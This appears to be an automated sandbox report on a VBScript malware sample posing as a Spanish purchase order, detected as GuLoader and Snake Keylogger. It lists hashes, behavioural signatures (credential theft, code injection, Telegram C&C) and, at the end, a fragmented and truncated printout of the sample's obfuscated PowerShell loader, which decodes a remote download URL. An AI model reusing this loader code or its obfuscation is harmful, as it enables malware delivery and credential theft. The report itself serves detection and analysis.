Edit tour
Windows
Analysis Report
Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
Overview
General Information
Sample name: | Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsrenamed because original name is a hash value |
Original sample name: | Distribuciones Enelca Jan, S.L. PEDIDO 456799.vbs |
Analysis ID: | 1540334 |
MD5: | 3f13eef87515d70fbdfedc6de7b6efc4 |
SHA1: | 8d2394c2e4daada6b8d9af1b60d8d11130ac1845 |
SHA256: | a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237 |
Tags: | vbsuser-abuse_ch |
Infos: | |
Detection
GuLoader, Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7792 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Distr ibuciones Enelca Ja# U00e9n, S. L. PEDIDO 456799.vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7924 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Ilks K apelmester Macrograp hic Irena Miseres Ap pendices L arcenic #> ;$Hogward1 94='Halskd ens';<#Tvt ningernes Sporendes Cortin #>; $Nonputtin g=$Reorche strate+$ho st.UI; fun ction Roos ting($Uncr ystalled){ If ($Nonpu tting) {$G eneriske++ ;}$Getid=$ Kommunikat ionsformen +$Uncrysta lled.'Leng th'-$Gener iske; for( $Pseudoem otional=5; $Pseudoemo tional -lt $Getid;$P seudoemoti onal+=6){$ Mandaars=$ Pseudoemot ional;$Ule mpevilkaar ene122+=$U ncrystalle d[$Pseudoe motional]; $klynkene= 'Xanthippe rne';}$Ule mpevilkaar ene122;}fu nction Out sprint($Ps eudoemotio nalncestuo us8){ . ($ Nonsubtili ty) ($Pseu doemotiona lncestuous 8);}$Lame= Roosting ' fresMSig loSel gzPo dodiVoltal KnaldlPlad saSenne/As tas ';$Lam e+=Roostin g 'Taarn5G auge. Crab 0Brneh Ino b(Raps WKo mediCulven HumpldSkip po NonrwLa ur sTakst Dks lNQuay TApost Ha and1Sec n0 ,ykm.Bri, a0Vejbr;ha ckw TrykfW reskoi,out rn Pria6No n o4H pot; Pt,ry ther ox Darl6Re ar4 tu,i; redi Pejl ir istyvTy pis:Omste1 Maall3Uhla n1 Flu..Su bsi0,arde) S lvc Apof eGEksore S amtcGrundk WinecoRet r/O tje2Re qu 0S,rap1 Phen0.lle l0Wa li1La cca0Udsag1 skyt, Dobb eFBr ndiVa ndsrtamtae ForegfProt eoSjuskxGl ass/Lgkno1 Dives3Hild i1emalj.Ta ile0O phy ';$Skibspr ovianterin gens=Roost ing ' Stat U UltrsUds uge FinaR Akro-Alkoh AAcolygAsy lbeIreniNh eftetsec,r ';$Discan onize=Roos ting 'sule mh RetstPl adetHyperp Brow,sBluf r:Atrsg/Di met/ Syn,d Bistrr Elg tiTvedevDr eneeElorg. Smughg Spo oWeb uoOo riagStorml ColleeUpbr a. OmorcN namoMfikkm Im er/came mu remicOp erc?Udkmpe Dyne xN.nr ap oceloTr a,srWreatt R.esu= ude dDagbaoInd snwRomannF odbolAelu oRecuraNgt fldLe le&S y taiFremk dUnsac= .r ig1 Hastq oppo2Kerne SVari NB y sk6DashedA blew6Fleks s nforfPop ulcAnthrOM on iENitr, eKa.enx,re enGTrope1S e ar9.lank WBjelia Eu phNSams,LD finkMis t wBiddeATel e,tProdutC orke4 ejld XRa et_Ant irkGruttCA delsyOphth ';$Elysis k57=Roosti ng 'Ou ha> Se is ';$N onsubtilit y=Roosting 'LibysiFo ruETactaX Histo ';$U ncapitaliz eds='Budce ntralens'; $Markedsun dersgelser ='\Bindehi ndens.Stu' ;Outsprint (Roosting 'Tu ul$I stigAfrohl lsgngOFavo ,BSuperaP otelOma d: .yvebSlib eA Whisgan tihM TolvA ulivsN edv iDSmaareDi spaN.nderS oxyty= Ste d$KolleEAp o eNSandpv Rdli:Vido vAPallep K ellpChartd HotheAadde tphalaaOp hol+Beaum$ Ov remDeci mA S emrQu attKFrokoE UncopDNonb is FimsUSo ljeNFantad Pu keePatt eRSklmeS r ed,GSy dee SkabeLLreb rSBecl,ePr darKnop ' );Outsprin t (Roostin g ' p nd$e utonGUro l l Cit OHyp odb RegnAA kkusL aski : rissaRve grcActsbhB mboEselvi nBouldILis seAInsurLD roll=Chefp $haem D ol oIValyls S idcSpindA rounNSand bO Radin B